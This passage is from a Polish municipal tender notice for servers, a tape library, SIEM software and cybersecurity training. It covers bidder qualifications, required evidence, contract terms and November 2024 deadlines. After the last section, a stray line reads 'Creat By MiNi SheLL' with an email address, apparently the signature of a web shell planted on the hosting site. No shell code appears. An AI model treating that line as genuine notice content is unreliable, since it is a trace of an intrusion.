rozwiązania SIEM Security Information and Event Managment.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek udziału w postępowaniu w powyższym zakresie – zostanie uznany za spełniony jeżeli jeden z członków konsorcjum wykaże się wykonaniem wymaganych zamówień (zapis stosuje się odpowiednio w przypadku polegania na podmiotach udostępniających zasoby). Doświadczenie Wykonawcy będzie uznawane, gdy Wykonawca wykaże dostawy zakończone. Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy Wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazanego zakresu prac. Zamawiający zastrzega sobie możliwość zwrócenia się do Wykonawcy o wyjaśnienia w zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez Wykonawcę faktur.<br/>b)	Wykonawca wykaże osoby, które skieruje do realizacji zamówienia publicznego, które spełniają następujące wymagania: <br/>1)	Inżynier ds. wdrażania urządzeń serwerowych (min. 1 osoba) posiadający:<br/>•	co najmniej 3-letnie doświadczenie w zakresie wdrożeń urządzeń serwerowych − doświadczenie w zakresie udziału w minimum dwóch projektach informatycznych,<br/>•	ważny certyfikat wydany przez producenta serwerów oferowanych w ramach postępowania potwierdzający kompetencje z zakresu wdrażania i konfigurowania sprzętu serwerowego,<br/>•	wykształcenie wyższe informatyczne. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2A do SWZ. 2. Wykonawca składa oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu (wg Załącznika nr 2B do SWZ), o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego. 3. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia oświadczenie<br/>podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, potwierdzające<br/>brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby (wg Załącznika nr 2B do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2A do SWZ.<br/>2. Wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których dostawy te zostały wykonane (wg Załącznika nr 3 do SWZ) oraz załączeniem dowodów określających,<br/>czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 11.1.	Zamawiający na podstawie art. 105-106 ustawy Pzp, na potwierdzenie zgodności oferowanego przedmiotu zamówienia, wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>11.1.1.	W zakresie Zadania nr 1 Wykonawca zobowiązany jest złożyć:<br/>1.	Szkolenie dla pracowników spoza działu IT (cyberbezpieczeństwo) <br/>a) Certyfikat ISO 9001 oraz 27001 w szczególności w zakresie szkoleń związanych z cyberbezpieczeństwem;<br/>b) Certyfikat ISO 22301.<br/>11.1.2.	W zakresie Zadania nr 2 Wykonawca zobowiązany jest złożyć:<br/>1. Serwer dla Urzędu Gminy<br/>a) Oświadczenie producenta, że serwis oferowanego serwera będzie: <br/>•	realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta; <br/>•	firma serwisująca posiada autoryzacje producenta oferowanego serwera; <br/>•	firma serwisująca posiada ISO 9001:2015 (lub równoważną) oraz ISO-27001 (lub równoważną) na świadczenie usług serwisowych;<br/>b)	Oświadczenie producenta oferowanego sprzętu potwierdzające, że w przypadku wystąpienia awarii dysku twardego w urządzeniu objętym aktywnym wparciem technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego.<br/>2. Serwer dla Gminnego Ośrodka Pomocy Społecznej<br/>a) Oświadczenie producenta, że serwis oferowanego serwera będzie: <br/>•	realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta; <br/>•	firma serwisująca posiada autoryzacje producenta oferowanego serwera; <br/>•	firma serwisująca posiada ISO 9001:2015 (lub równoważną) oraz ISO-27001 (lub równoważną) na świadczenie usług serwisowych<br/>b) Oświadczenie producenta oferowanego sprzętu potwierdzające, że w przypadku wystąpienia awarii dysku twardego w urządzeniu objętym aktywnym wparciem technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego.<br/>3. Biblioteka taśmowa dla Urzędu Gminy<br/>a) Oświadczenie producenta, że serwis oferowanego serwera będzie: <br/>•	realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta; <br/>•	firma serwisująca posiada autoryzacje producenta oferowanego serwera; <br/>•	firma serwisująca posiada ISO 9001:2015 (lub równoważną) oraz ISO-27001 (lub równoważną) na świadczenie usług serwisowych.<br/> 4. Oprogramowanie SIEM (Security Information and Event Management) dla Urzędu Gminy<br/>a)	Oferowany produkt musi znajdować się w kwadracie liderów Gartner Magic Quadrant for Endpoint	Detection	and	Response	(EDR)	Solutions	Market https://www.gartner.com/reviews/market/endpoint-detection-and-response-solutions minimalne wymaganie: minimalna liczba referencji 17,minimalna ocena z referencji 4,4;<br/>b)	certyfikat ISO 9001 oraz 27001 w szczególności dla usług	związanych	z cyberbezpieczeństwem, dla Producenta systemu lub autoryzowanego Dystrybutora;<br/>b) Oświadczanie Producenta lub Autoryzowanego Dystrybutora producenta świadczącego wsparcie techniczne o gotowości świadczenia na rzecz Zamawiającego wymaganego serwisu (zawierające: adres strony internetowej serwisu i numer infolinii telefonicznej);<br/>d)	Certyfikat ISO 9001 oraz 27001 autoryzowanego podmiotu serwisującego.<br/>Zamawiający, na podstawie art. 107 ust. 2 ustawy Pzp, przewiduje wezwanie Wykonawcy do złożenia lub uzupełnienia przedmiotowych środków dowodowych, jeżeli nie zostaną złożone wraz z ofertą lub będą niekompletne. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Zamawiający na podstawie art. 105-106 ustawy Pzp, na potwierdzenie zgodności oferowanego przedmiotu zamówienia,<br/>wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>2. W zakresie Zadania nr 1 wykaz przedmiotowych środków dowodowych szczegółowo został opisany w Rozdziale 11 pkt.<br/>11.1.1. SWZ.<br/>3. W zakresie Zadania nr 2 wykaz przedmiotowych środków dowodowych szczegółowo został opisany w Rozdziale 11 pkt.<br/>11.1.2. SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W przypadku, gdy Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu polega na zdolnościach podmiotów udostępniających zasoby, zobowiązany jest dołączyć do oferty:<br/>1) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw do wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby, o którym mowa w art. 125 ust. 1 ustawy PZP (wg Załącznika nr 2A do SWZ), 2) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia (wg Załącznika nr 4 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienia, będzie dysponował zasobami tych podmiotów. Zobowiązanie to określa w szczególności: a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby; b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>II. Wykonawca może złożyć tylko jedną ofertę. III. Treść oferty musi być zgodna z wymaganiami Zamawiającego określonymi w dokumentach zamówienia. IV. Ofertę sporządza się w języku polskim na formularzu oferty (wg Załącznika nr 1 do SWZ). V. Kompletna oferta Wykonawcy powinna zawierać: 1) formularz oferty – wg Załącznika nr 1 do SWZ;<br/>2) pełnomocnictwo lub inny dokument potwierdzający uprawnienie do podpisania oferty (np. KRS, CEiDG, uchwała zgromadzenia wspólników),<br/>3) oświadczenie Wykonawcy, o którym mowa w rozdz. 8 (wg Załącznika nr 2A do SWZ), 4) oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy, o którym mowa w rozdz. 12 ust. 12.1<br/>pkt 2 SWZ – wg Załącznika nr 2C do SWZ (jeżeli dotyczy),<br/>5) przedmiotowe środki dowodowe określone w rozdz. 11 SWZ,<br/>6) Opis przedmiotu zamówienia w zakresie Zadanie nr 1 wg Załącznika nr 6a do SWZ wraz z potwierdzeniem parametrów oferowanego przedmiotu zamówienia, 7) Opis przedmiotu zamówienia w zakresie Zadanie nr 2 wg Załącznika nr 6b do SWZ wraz z potwierdzeniem parametrów<br/>oferowanego przedmiotu zamówienia, 8) dokumenty dotyczące podmiotu udostępniającego zasoby (jeżeli dotyczy): a) oświadczenie podmiotu udostępniającego zasoby, o którym mowa w rozdz.12 ust. 12.2 pkt 1 SWZ – wg Załącznika nr 2A do SWZ, b) dokumenty, o których mowa w rozdz.12 ust. 12.2 pkt 2 SWZ, c) pełnomocnictwo lub inny dokument potwierdzający uprawnienie do podpisania dokumentów dotyczących podmiotu<br/>udostępniającego zasoby (np. KRS, CEiDG, uchwała zgromadzenia wspólników). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w celu potwierdzenia, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu winien złożyć:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP (wg Załącznika nr 2A do SWZ) – składa każdy Wykonawca do oferty,<br/>2) oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy w przypadku Wykonawców wspólnie ubiegających się o zamówienie (wg Załącznika nr 2C do SWZ) – składa każdy z Wykonawców do oferty, 3) oświadczenie, o którym mowa w rozdz. 9 pkt. 1 SWZ (wg Załącznika nr 2B do SWZ) – składa każdy z Wykonawców na wezwanie Zamawiającego,<br/>4) dokumenty, o których mowa w rozdz. 10 SWZ – składa odpowiednio Wykonawca, który wykazuje spełnienie warunku, w zakresie i na zasadach opisanych odpowiednio w rozdz. 6 SWZ – na wezwanie Zamawiającego, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy określa wzór umowy stanowiący Załącznik nr 5a i 5b do SWZ. Złożenie oferty jest równoznaczne z pełną akceptacją projektu umowy przez Wykonawcę. Wykonawca, który przedstawił najkorzystniejszą ofertę, będzie zobowiązany do podpisania umowy zgodnej ze wzorem umowy załączonym do SWZ.<br/>Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania szczegółowo zostały opisane w paragrafie 13 w przypadku Załącznika nr 5a do SWZ oraz w paragrafie 10 w przypadku Załącznika nr 5b do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/rogowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-18 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie dotyczy.

Creat By MiNi SheLL
Email: jattceo@gmail.com